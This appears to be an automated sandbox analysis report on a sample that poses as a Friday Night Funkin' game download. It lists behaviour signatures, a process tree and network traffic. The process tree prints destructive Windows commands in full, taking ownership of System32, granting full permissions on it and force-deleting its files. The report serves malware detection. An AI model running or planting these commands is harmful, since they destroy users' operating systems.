Analysis Overview
SHA256
1c34cd45dd2bb8c44a48d60aea5e0ce811ae416b220361c8e35e7411e8801379
Threat Level: Likely malicious
The file TTYD_EU_REL_Loader_v1.gci was found to be: Likely malicious.
Malicious Activity Summary
Nirsoft
Possible privilege escalation attempt
Executes dropped EXE
Modifies file permissions
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of SendNotifyMessage
Checks processor information in registry
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
NTFS ADS
Modifies registry class
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Analysis: static1
Detonation Overview
Reported
2024-06-27 20:20
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-27 20:20
Reported
2024-06-27 20:25
Platform
win10v2004-20240611-en
Max time kernel
183s
Max time network
273s
Signatures
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\Downloads\supervirus.zip:Zone.Identifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: 33 | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\system32\AUDIODG.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\TTYD_EU_REL_Loader_v1.gci
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\TTYD_EU_REL_Loader_v1.gci"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4bc 0x394
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\supervirus\Funkin.exe
"C:\Users\Admin\Downloads\supervirus\Funkin.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & takeown /F C:\Windows\System32 /A /R /d y
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
C:\Windows\system32\takeown.exe
takeown /F C:\Windows\System32 /A /R /d y
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & ICACLS C:\Windows\System32 /grant administrators:F /T
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
C:\Windows\system32\icacls.exe
ICACLS C:\Windows\System32 /grant administrators:F /T
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & cacls C:\Windows\System32
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
C:\Windows\system32\cacls.exe
cacls C:\Windows\System32
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c START /B /wait "" "C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'" & cd C:\Windows\System32 && del /f/q/s *.* > nul
C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe
"C:\Users\Admin\Downloads\supervirus\assets\data\ridge\ridge.exe" win activate stitle "Friday Night Funkin'"
Network
| US | 8.8.8.8:53 | m.gjcdn.net | udp |
| US | 104.18.25.184:443 | m.gjcdn.net | tcp |
| US | 8.8.8.8:53 | m.gjcdn.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | v-2.gjcdn.net | udp |
| US | 8.8.8.8:53 | m.gjcdn.net | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 104.18.25.184:443 | v-2.gjcdn.net | udp |
| US | 8.8.8.8:53 | v-2.gjcdn.net | udp |
| US | 104.18.25.184:443 | v-2.gjcdn.net | tcp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 184.25.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | v-2.gjcdn.net | udp |
| US | 104.18.25.184:443 | v-2.gjcdn.net | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firebaselogging-pa.googleapis.com | udp |
| GB | 172.217.16.234:443 | firebaselogging-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | firebaselogging-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | firebaselogging-pa.googleapis.com | udp |
| GB | 172.217.16.234:443 | firebaselogging-pa.googleapis.com | udp |
| GB | 172.217.16.234:443 | firebaselogging-pa.googleapis.com | udp |
| US | 8.8.8.8:53 | global.proper.io | udp |
| GB | 99.86.114.119:443 | global.proper.io | tcp |
| US | 8.8.8.8:53 | global.proper.io | udp |
| US | 8.8.8.8:53 | global.proper.io | udp |
| US | 8.8.8.8:53 | 119.114.86.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 192.0.73.2:443 | secure.gravatar.com | tcp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 192.0.73.2:443 | secure.gravatar.com | udp |
| US | 8.8.8.8:53 | i2.wp.com | udp |
| US | 192.0.77.2:443 | i2.wp.com | tcp |
| US | 8.8.8.8:53 | i2.wp.com | udp |
| US | 8.8.8.8:53 | i2.wp.com | udp |
| US | 192.0.77.2:443 | i2.wp.com | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | abcheck.proper.io | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| GB | 18.244.114.7:443 | abcheck.proper.io | tcp |
| GB | 18.244.114.7:443 | abcheck.proper.io | tcp |
| US | 8.8.8.8:53 | abcheck.proper.io | udp |
| US | 8.8.8.8:53 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | abcheck.proper.io | udp |
| US | 8.8.8.8:53 | 2.73.0.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.77.0.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.114.244.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | secure.quantserve.com | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| US | 52.11.10.79:443 | bids.proper.io | tcp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| US | 8.8.8.8:53 | global.px.quantserve.com | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| US | 8.8.8.8:53 | global.px.quantserve.com | udp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| DE | 91.228.74.200:443 | global.px.quantserve.com | tcp |
| US | 52.32.42.129:443 | bids.proper.io | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | tcp |
| DE | 91.228.74.200:443 | global.px.quantserve.com | tcp |
| GB | 142.250.200.34:443 | securepubads.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | rules.quantcount.com | udp |
| US | 8.8.8.8:53 | d2fashanjl7d9f.cloudfront.net | udp |
| US | 8.8.8.8:53 | d2fashanjl7d9f.cloudfront.net | udp |
| US | 8.8.8.8:53 | 200.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.42.32.52.in-addr.arpa | udp |
| GB | 18.245.187.55:443 | d2fashanjl7d9f.cloudfront.net | tcp |
| US | 8.8.8.8:53 | pixel.quantserve.com | udp |
| US | 8.8.8.8:53 | fundingchoicesmessages.google.com | udp |
| GB | 142.250.187.238:443 | fundingchoicesmessages.google.com | tcp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| GB | 142.250.187.238:443 | www3.l.google.com | udp |
| DE | 91.228.74.166:443 | pixel.quantserve.com | tcp |
| US | 8.8.8.8:53 | 55.187.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.10.11.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.74.228.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rtb.gumgum.com | udp |
| US | 8.8.8.8:53 | x.bidswitch.net | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | ups.analytics.yahoo.com | udp |
| US | 8.8.8.8:53 | c.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| IE | 52.208.44.24:443 | rtb.gumgum.com | tcp |
| US | 8.8.8.8:53 | rtb.gumgum.com | udp |
| DE | 3.71.149.231:443 | ups.analytics.yahoo.com | tcp |
| US | 8.8.8.8:53 | ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud | udp |
| DE | 162.19.138.119:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| GB | 13.224.223.9:443 | c.amazon-adsystem.com | tcp |
| NL | 35.214.149.91:443 | x.bidswitch.net | tcp |
| US | 8.8.8.8:53 | ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | rtb.gumgum.com | udp |
| US | 8.8.8.8:53 | d1ykf07e75w7ss.cloudfront.net | udp |
| US | 8.8.8.8:53 | user-data-eu.bidswitch.net | udp |
| US | 8.8.8.8:53 | user-data-eu.bidswitch.net | udp |
| US | 8.8.8.8:53 | d1ykf07e75w7ss.cloudfront.net | udp |
| GB | 13.224.223.9:443 | d1ykf07e75w7ss.cloudfront.net | tcp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | 24.44.208.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.149.71.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.223.224.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.138.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.149.214.35.in-addr.arpa | udp |
| GB | 52.84.90.126:443 | config.aps.amazon-adsystem.com | tcp |
| GB | 52.84.90.126:443 | config.aps.amazon-adsystem.com | tcp |
| US | 8.8.8.8:53 | 98.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.90.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | secure.cdn.fastclick.net | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | b-code.liadm.com | udp |
| US | 8.8.8.8:53 | cdn.hadronid.net | udp |
| US | 8.8.8.8:53 | config.aps.amazon-adsystem.com | udp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | e4536.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | aps.zqtk.net | udp |
| US | 104.22.53.173:443 | cdn.hadronid.net | tcp |
| US | 8.8.8.8:53 | detgh1asa1dg4.cloudfront.net | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| FR | 172.234.63.227:443 | aps.zqtk.net | tcp |
| US | 8.8.8.8:53 | tags.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | e4536.g.akamaiedge.net | udp |
| US | 8.8.8.8:53 | detgh1asa1dg4.cloudfront.net | udp |
| US | 8.8.8.8:53 | cdn.hadronid.net | udp |
| US | 8.8.8.8:53 | linode-api.eu-west.proximic.com | udp |
| US | 8.8.8.8:53 | cdn.hadronid.net | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 8.8.8.8:53 | id.hadron.ad.gt | udp |
| US | 8.8.8.8:53 | linode-api.eu-west.proximic.com | udp |
| US | 8.8.8.8:53 | cdn.id5-sync.com | udp |
| US | 104.22.5.69:443 | id.hadron.ad.gt | tcp |
| US | 104.22.5.69:443 | id.hadron.ad.gt | tcp |
| US | 8.8.8.8:53 | id.hadron.ad.gt.cdn.cloudflare.net | udp |
| US | 104.22.5.69:443 | id.hadron.ad.gt.cdn.cloudflare.net | tcp |
| DE | 184.30.211.26:443 | e4536.g.akamaiedge.net | tcp |
| GB | 18.245.143.100:443 | tags.crwdcntrl.net | tcp |
| GB | 18.165.227.10:443 | detgh1asa1dg4.cloudfront.net | tcp |
| US | 104.22.52.86:443 | cdn.id5-sync.com | tcp |
| US | 8.8.8.8:53 | 173.53.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.63.234.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.5.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.227.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.143.245.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.52.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | a.ad.gt | udp |
| US | 104.22.5.69:443 | a.ad.gt | tcp |
| US | 8.8.8.8:53 | a.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | a.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | ids.ad.gt | udp |
| US | 8.8.8.8:53 | secure.adnxs.com | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | image2.pubmatic.com | udp |
| US | 8.8.8.8:53 | token.rubiconproject.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | sync.smartadserver.com | udp |
| US | 44.239.184.8:443 | ids.ad.gt | tcp |
| US | 44.239.184.8:443 | ids.ad.gt | tcp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | sync.go.sonobi.com | udp |
| US | 8.8.8.8:53 | bh.contextweb.com | udp |
| US | 8.8.8.8:53 | p.ad.gt | udp |
| US | 8.8.8.8:53 | ids.ad.gt | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 8.8.8.8:53 | ids.ad.gt | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 104.22.5.69:443 | p.ad.gt | tcp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | match.adsrvr.org | udp |
| US | 8.8.8.8:53 | pixel.rubiconproject.net.akadns.net | udp |
| US | 8.8.8.8:53 | id.hadron.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | pug-ams-bc.pubmnet.com | udp |
| US | 8.8.8.8:53 | rtb-csync-euw2.smartadserver.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| IE | 34.254.52.227:443 | bcp.crwdcntrl.net | tcp |
| US | 8.8.8.8:53 | pug-ams-bc.pubmnet.com | udp |
| US | 8.8.8.8:53 | rtb-csync-euw2.smartadserver.com | udp |
| US | 8.8.8.8:53 | cm.g.doubleclick.net | udp |
| US | 104.22.5.69:443 | p.ad.gt | tcp |
| US | 8.8.8.8:53 | pixels.ad.gt | udp |
| US | 104.22.5.69:443 | pixels.ad.gt | tcp |
| US | 104.22.5.69:443 | pixels.ad.gt | tcp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | iad-2-sync.go.sonobi.com | udp |
| US | 8.8.8.8:53 | am1-direct-bgp.contextweb.com | udp |
| US | 8.8.8.8:53 | u.openx.net | udp |
| US | 8.8.8.8:53 | iad-2-sync.go.sonobi.com | udp |
| US | 104.22.4.69:443 | pixels.ad.gt | tcp |
| US | 8.8.8.8:53 | am1-direct-bgp.contextweb.com | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | p.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | p.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | bcp.crwdcntrl.net | udp |
| US | 8.8.8.8:53 | pixels.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | pixels.ad.gt.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | 26.211.30.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.184.239.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.4.22.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.52.254.34.in-addr.arpa | udp |
| NL | 185.89.210.90:443 | ib.anycast.adnxs.com | tcp |
| US | 15.197.193.217:443 | match.adsrvr.org | tcp |
| NL | 198.47.127.205:443 | pug-ams-bc.pubmnet.com | tcp |
| NL | 69.173.156.149:443 | pixel.rubiconproject.net.akadns.net | tcp |
| GB | 216.58.204.66:443 | cm.g.doubleclick.net | tcp |
| FR | 217.182.178.233:443 | rtb-csync-euw2.smartadserver.com | tcp |
| US | 35.244.159.8:443 | u.openx.net | tcp |
| US | 69.166.1.66:443 | iad-2-sync.go.sonobi.com | tcp |
| NL | 208.93.169.131:443 | am1-direct-bgp.contextweb.com | tcp |
| GB | 216.58.204.66:443 | cm.g.doubleclick.net | tcp |
| US | 35.244.159.8:443 | u.openx.net | udp |
| GB | 216.58.204.66:443 | cm.g.doubleclick.net | udp |
| DE | 162.19.138.119:443 | id5-sync.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| NL | 185.89.210.90:443 | ib.anycast.adnxs.com | tcp |
| FR | 217.182.178.233:443 | rtb-csync-euw2.smartadserver.com | tcp |
| US | 69.166.1.66:443 | iad-2-sync.go.sonobi.com | tcp |
| DE | 162.19.138.119:443 | lb.eu-1-id5-sync.com | tcp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | lb.eu-1-id5-sync.com | udp |
| US | 8.8.8.8:53 | id5-sync.com | udp |
| US | 8.8.8.8:53 | usync.proper.io | udp |
| US | 54.191.164.137:443 | usync.proper.io | tcp |
| US | 8.8.8.8:53 | usync.proper.io | udp |
| US | 8.8.8.8:53 | 217.193.197.15.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.159.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.127.47.198.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.169.93.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.156.173.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.210.89.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.178.182.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.1.166.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | usync.proper.io | udp |
| US | 8.8.8.8:53 | 137.164.191.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 104.18.5.160:443 | gamejolt.com | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 104.18.24.184:443 | v-2.gjcdn.net | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | tcp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | tcp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 8.8.8.8:53 | region1.analytics.google.com | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | www.google.co.uk | udp |
| US | 216.239.34.36:443 | region1.analytics.google.com | udp |
| GB | 142.250.200.3:443 | www.google.co.uk | udp |
| GB | 142.250.178.10:443 | firebaselogging-pa.googleapis.com | udp |
| BE | 64.233.167.155:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.167.233.64.in-addr.arpa | udp |
| BE | 64.233.167.155:443 | stats.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 192.0.73.2:443 | secure.gravatar.com | udp |
| US | 8.8.8.8:53 | secure.gravatar.com | udp |
| US | 192.0.77.2:443 | i2.wp.com | udp |
| US | 104.18.25.184:443 | v-2.gjcdn.net | udp |
| US | 8.8.8.8:53 | bids.proper.io | udp |
| GB | 142.250.200.34:443 | cm.g.doubleclick.net | udp |
| US | 8.8.8.8:53 | hbopenbid.pubmatic.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | fastlane.rubiconproject.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| US | 8.8.8.8:53 | ssc.33across.com | udp |
| US | 8.8.8.8:53 | ib.adnxs.com | udp |
| US | 104.18.36.155:443 | htlb.casalemedia.com | tcp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| GB | 108.138.217.66:443 | hb.yellowblue.io | tcp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| GB | 185.64.190.77:443 | hbopenbid.pubmatic.com | tcp |
| NL | 185.89.210.122:443 | ib.adnxs.com | tcp |
| US | 34.149.20.76:443 | ssc.33across.com | tcp |
| US | 34.149.20.76:443 | ssc.33across.com | tcp |
| US | 34.120.63.153:443 | prebid.media.net | tcp |
| NL | 69.173.156.139:443 | fastlane.rubiconproject.com | tcp |
| US | 8.8.8.8:53 | hbopenbid-lhrc.pubmnet.com | udp |
| US | 8.8.8.8:53 | tlx.3lift.com | udp |
| US | 8.8.8.8:53 | htlb.casalemedia.com | udp |
| US | 8.8.8.8:53 | targeting.unrulymedia.com | udp |
| US | 8.8.8.8:53 | apex.go.sonobi.com | udp |
| US | 8.8.8.8:53 | rtb.openx.net | udp |
| US | 8.8.8.8:53 | ap.lijit.com | udp |
| US | 8.8.8.8:53 | hb.yellowblue.io | udp |
| US | 8.8.8.8:53 | hbopenbid-lhrc.pubmnet.com | udp |
| US | 8.8.8.8:53 | a.teads.tv | udp |
| US | 8.8.8.8:53 | bidder.criteo.com | udp |
| US | 8.8.8.8:53 | btlr.sharethrough.com | udp |
| US | 8.8.8.8:53 | ib.anycast.adnxs.com | udp |
| US | 69.166.1.9:443 | apex.go.sonobi.com | tcp |
| DE | 3.124.64.248:443 | tlx.3lift.com | tcp |
| NL | 46.228.174.115:443 | targeting.unrulymedia.com | tcp |
| IE | 79.125.108.226:443 | ap.lijit.com | tcp |
| US | 35.227.252.103:443 | rtb.openx.net | tcp |
| US | 8.8.8.8:53 | ssc.33across.com | udp |
| US | 8.8.8.8:53 | prebid.media.net | udp |
| BE | 23.55.97.75:443 | a.teads.tv | tcp |
| US | 8.8.8.8:53 | tagged-by.rubiconproject.net.akadns.net | udp |
